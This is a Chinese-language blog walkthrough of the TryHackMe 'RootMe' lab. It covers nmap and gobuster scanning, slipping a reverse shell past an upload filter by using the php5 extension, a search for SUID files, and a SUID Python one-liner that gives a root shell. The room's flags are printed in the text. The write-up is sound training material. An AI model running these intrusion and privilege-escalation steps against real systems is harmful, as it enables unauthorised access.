

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/tx_02.png">
  <link rel="icon" href="/img/tx_02.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="CQ-tanyu">
  <meta name="keywords" content="">
  
    <meta name="description" content="（房间链接：TryHackMe | RootMe） 这是我打的第一个实践房间，简单记录一下 （本次房间用到的是TryHackMe的漏洞盒子） 看名字就知道这个房间涉及到提权 先看一下我们的任务 信息收集 打开网站看一看  直接Nmap开扫 1nmap -A -sC -sV 10.10.81.56       参数 说明    -A 启用操作系统和版本检测，执行内置脚本以进行进一步枚举   -sC">
<meta property="og:type" content="article">
<meta property="og:title" content="【Thm红队】RootMe(信息收集,文件上传,提权)">
<meta property="og:url" content="https://itanyu.cn/2024/03/05/%E3%80%90Thm%E7%BA%A2%E9%98%9F%E3%80%91RootMe-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-%E6%8F%90%E6%9D%83/index.html">
<meta property="og:site_name" content="TANYU&#39;S BLOG | 你越安静,你能听到的就越多">
<meta property="og:description" content="（房间链接：TryHackMe | RootMe） 这是我打的第一个实践房间，简单记录一下 （本次房间用到的是TryHackMe的漏洞盒子） 看名字就知道这个房间涉及到提权 先看一下我们的任务 信息收集 打开网站看一看  直接Nmap开扫 1nmap -A -sC -sV 10.10.81.56       参数 说明    -A 启用操作系统和版本检测，执行内置脚本以进行进一步枚举   -sC">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://itanyu.cn/img/default_tryhackme.png">
<meta property="article:published_time" content="2024-03-05T07:48:55.000Z">
<meta property="article:modified_time" content="2024-03-06T07:30:14.512Z">
<meta property="article:author" content="CQ-tanyu">
<meta property="article:tag" content="Thm">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://itanyu.cn/img/default_tryhackme.png">
  
  
  
  <title>【Thm红队】RootMe(信息收集,文件上传,提权) - TANYU&#39;S BLOG | 你越安静,你能听到的就越多</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"itanyu.cn","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"⭐","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.0.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong class="navbar-title">TANYU&#39;S BLOG</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/bg_011.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="【Thm红队】RootMe(信息收集,文件上传,提权)"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-03-05 15:48" pubdate>
          2024年3月5日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          10 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>

	

  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">【Thm红队】RootMe(信息收集,文件上传,提权)</h1>
            
            
              <div class="markdown-body">
                
                <p>（房间链接：<a target="_blank" rel="noopener" href="https://tryhackme.com/room/rrootme">TryHackMe | RootMe</a>）</p>
<p>这是我打的第一个实践房间，简单记录一下</p>
<p>（本次房间用到的是TryHackMe的漏洞盒子）</p>
<p>看名字就知道这个房间涉及到提权</p>
<p>先看一下我们的任务</p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a><strong>信息收集</strong></h2><p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_11-26-03.png" srcset="/img/loading.gif" lazyload></p>
<p>打开网站看一看</p>
<p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_12-11-46.png" srcset="/img/loading.gif" lazyload></p>
<p>直接Nmap开扫</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">nmap -A -sC -sV 10.10.81.56<br></code></pre></td></tr></table></figure>



<table>
<thead>
<tr>
<th>参数</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>-A</td>
<td><strong>启用</strong>操作系统<strong>和版本检测，执行内置脚本以进行进一步枚举</strong></td>
</tr>
<tr>
<td>-sC</td>
<td>使用默认Nmap脚本扫描</td>
</tr>
<tr>
<td>-sV</td>
<td><strong>尝试确定正在运行的服务的版本</strong></td>
</tr>
</tbody></table>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs shell">root@ip-10-10-8-87:~# nmap -A -sC -sV 10.10.81.56<br><br>Starting Nmap 7.60 ( https://nmap.org ) at 2024-02-04 03:30 GMT<br>Nmap scan report for ip-10-10-81-56.eu-west-1.compute.internal (10.10.81.56)<br>Host is up (0.00035s latency).<br>Not shown: 998 closed ports<br>PORT   STATE SERVICE VERSION<br>22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)<br>| ssh-hostkey: <br>|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)<br>|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)<br>|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (EdDSA)<br>80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))<br>| http-cookie-flags: <br>|   /: <br>|     PHPSESSID: <br>|_      httponly flag not set<br>|_http-server-header: Apache/2.4.29 (Ubuntu)<br>|_http-title: HackIT - Home<br>MAC Address: 02:25:76:44:D1:43 (Unknown)<br>No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).<br>TCP/IP fingerprint:<br>OS:SCAN(V=7.60%E=4%D=2/4%OT=22%CT=1%CU=34920%PV=Y%DS=1%DC=D%G=Y%M=022576%TM<br>OS:=65BF04D4%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)<br>OS:SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M230<br>OS:1ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)W<br>OS:IN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F<br>OS:507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)<br>OS:T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%<br>OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(<br>OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0<br>OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)<br><br>Network Distance: 1 hop<br>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel<br><br>TRACEROUTE<br>HOP RTT     ADDRESS<br>1   0.35 ms ip-10-10-81-56.eu-west-1.compute.internal (10.10.81.56)<br><br>OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .<br>Nmap done: 1 IP address (1 host up) scanned in 23.21 seconds<br></code></pre></td></tr></table></figure>

<p>开放端口：22，80</p>
<p>运行版本：Apache&#x2F;2.4.29</p>
<p>22端口服务：ssh</p>
<p>接着使用 GoBuster 工具在 Web 服务器上查找目录</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">gobuster dir -u 10.10.81.56 -w &#x27;/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt&#x27;<br></code></pre></td></tr></table></figure>



<table>
<thead>
<tr>
<th>参数</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>dir</td>
<td>使用目录&#x2F;文件枚举模式</td>
</tr>
<tr>
<td>-u</td>
<td>输入要扫描的网站</td>
</tr>
<tr>
<td>-w, –wordlist string</td>
<td>指向字典文件的路径</td>
</tr>
</tbody></table>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs shell">root@ip-10-10-8-87:~# gobuster dir -u 10.10.81.56 -w &#x27;/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt&#x27; <br>===============================================================<br>Gobuster v3.0.1<br>by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)<br>===============================================================<br>[+] Url:            http://10.10.81.56<br>[+] Threads:        10<br>[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt<br>[+] Status codes:   200,204,301,302,307,401,403<br>[+] User Agent:     gobuster/3.0.1<br>[+] Timeout:        10s<br>===============================================================<br>2024/02/04 03:49:30 Starting gobuster<br>===============================================================<br>/uploads (Status: 301)<br>/css (Status: 301)<br>/js (Status: 301)<br>/panel (Status: 301)<br>===============================================================<br>2024/02/04 03:49:39 Finished<br>===============================================================<br></code></pre></td></tr></table></figure>

<p>可能为隐藏目录：&#x2F;panel&#x2F;</p>
<h2 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h2><p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_12-09-28.png" srcset="/img/loading.gif" lazyload></p>
<p>查看隐藏目录，为文件上传</p>
<p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_12-13-22.png" srcset="/img/loading.gif" lazyload></p>
<p>接下来上传反向shell</p>
<p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_12-18-46.png" srcset="/img/loading.gif" lazyload></p>
<p>发现不允许php文件类型上传</p>
<p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_12-19-21.png" srcset="/img/loading.gif" lazyload></p>
<p>可以用BurpSuite进行请求包修改</p>
<p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_12-25-24.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_12-25-51.png" srcset="/img/loading.gif" lazyload></p>
<p>通过响应包长度可以看到允许txt，php5文件类型上传</p>
<p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_12-30-13.png" srcset="/img/loading.gif" lazyload></p>
<p>接下来执行shell文件</p>
<p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_12-33-07.png" srcset="/img/loading.gif" lazyload></p>
<p>成功连接上shell后，查找user.txt文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">find -name user.txt<br></code></pre></td></tr></table></figure>

<p>结果文件太多了QAQ</p>
<p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_12-38-57.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">find / -type f -name user.txt 2&gt; /dev/null<br></code></pre></td></tr></table></figure>

<p>将其它所有内容都设置为null</p>
<p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_12-45-16.png" srcset="/img/loading.gif" lazyload></p>
<p>user.txt文件路径：&#x2F;var&#x2F;www&#x2F;user.txt</p>
<p>user.txt文件内容：THM{y0u_g0t_a_sh3ll}</p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_12-48-52.png" srcset="/img/loading.gif" lazyload></p>
<p><strong>现在已经入侵了这台机器，我们将升级权限并成为超级用户（root）</strong></p>
<p><img src="/img/Thm/RootMe/20231222100903434.webp" srcset="/img/loading.gif" lazyload></p>
<p>在Linux中，SUID（<strong>执行时设置所有者 userId</strong>）是赋予文件的一种特定类型的文件权限。SUID 向用户授予临时权限，以在文件所有者（而不是运行它的用户）的许可下运行程序&#x2F;文件。</p>
<p>例如，用于更改密码的二进制文件设置了 SUID 位 (&#x2F;usr&#x2F;bin&#x2F;passwd)。这是因为要更改您的密码；它将需要写入您无权访问的 Shadowers 文件，而 root 可以；因此它具有 root 权限来进行正确的更改。</p>
<table>
<thead>
<tr>
<th>linux文件权限</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td>特殊权限 suid</td>
<td>作用于文件属主</td>
</tr>
<tr>
<td>特殊权限 sgid</td>
<td>作用于属组上</td>
</tr>
<tr>
<td>特殊权限 sticky</td>
<td>作用于other其他上</td>
</tr>
</tbody></table>
<p>查找SUID权限的root拥有</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">find / -type f -user root -perm -u=s 2&gt; /dev/null<br></code></pre></td></tr></table></figure>

<p>这些都是具有SUID权限的文件，其中Python可以作为设置UID运行</p>
<p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_13-03-11.png" srcset="/img/loading.gif" lazyload></p>
<p>可疑文件：&#x2F;usr&#x2F;bin&#x2F;python</p>
<p><a target="_blank" rel="noopener" href="https://gtfobins.github.io/">GTFOBins</a>查找Python</p>
<p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_13-52-13.png" srcset="/img/loading.gif" lazyload></p>
<p>进行提权</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">python -c &#x27;import os; os.execl(&quot;/bin/sh&quot;, &quot;sh&quot;, &quot;-p&quot;)&#x27;<br></code></pre></td></tr></table></figure>

<p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_13-54-25.png" srcset="/img/loading.gif" lazyload></p>
<p>最后查找root.txt文件内容</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">find / -type f -name root.txt 2&gt; /dev/null<br></code></pre></td></tr></table></figure>

<p><img src="/img/Thm/RootMe/Snipaste_2024-02-04_13-59-51.png" srcset="/img/loading.gif" lazyload></p>
<p>root.txt文件内容：THM{pr1v1l3g3_3sc4l4t10n}</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Thm/" class="category-chain-item">Thm</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Thm/" class="print-no-link">#Thm</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>【Thm红队】RootMe(信息收集,文件上传,提权)</div>
      <div>https://itanyu.cn/2024/03/05/【Thm红队】RootMe-信息收集-文件上传-提权/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>CQ-tanyu</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年3月5日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/03/05/%E3%80%90Thm%E7%BA%A2%E9%98%9F%E3%80%91Basic-Pentesting-%E5%9F%BA%E6%9C%AC%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" title="【Thm红队】Basic Pentesting(基本渗透测试)">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">【Thm红队】Basic Pentesting(基本渗透测试)</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/03/03/%E9%9D%92%E5%B0%91%E5%B9%B4CTF%E6%93%82%E5%8F%B0%E6%8C%91%E6%88%98%E8%B5%9B-2024-Round-1-%E3%80%90Web%E5%A4%8D%E7%8E%B0%E3%80%91/" title="青少年CTF擂台挑战赛 2024 Round 1 【Web复现】">
                        <span class="hidden-mobile">青少年CTF擂台挑战赛 2024 Round 1 【Web复现】</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
<div>
  <span id="timeDate">正在载入天数...</span>
  <span id="times">载入时分秒...</span>
  <script>
  var now = new Date();
  function createtime(){
      var grt= new Date("01/07/2024 00:00:00");
      now.setTime(now.getTime()+250);
      days = (now - grt ) / 1000 / 60 / 60 / 24;
      dnum = Math.floor(days);
      hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
      hnum = Math.floor(hours);
      if(String(hnum).length ==1 ){
          hnum = "0" + hnum;
      }
      minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
      mnum = Math.floor(minutes);
      if(String(mnum).length ==1 ){
                mnum = "0" + mnum;
      }
      seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
      snum = Math.round(seconds);
      if(String(snum).length ==1 ){
                snum = "0" + snum;
      }
      document.getElementById("timeDate").innerHTML = "🚀已持续航行&nbsp"+dnum+"&nbsp天";  
      document.getElementById("times").innerHTML = hnum + "&nbsp时&nbsp" + mnum + "&nbsp分&nbsp" + snum + "&nbsp秒";
  }
  setInterval("createtime()",250);
  </script>
</div>

  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
<!--浏览器搞笑标题-->
<script type="text/javascript" src="\js\FunnyTitle.js"></script>
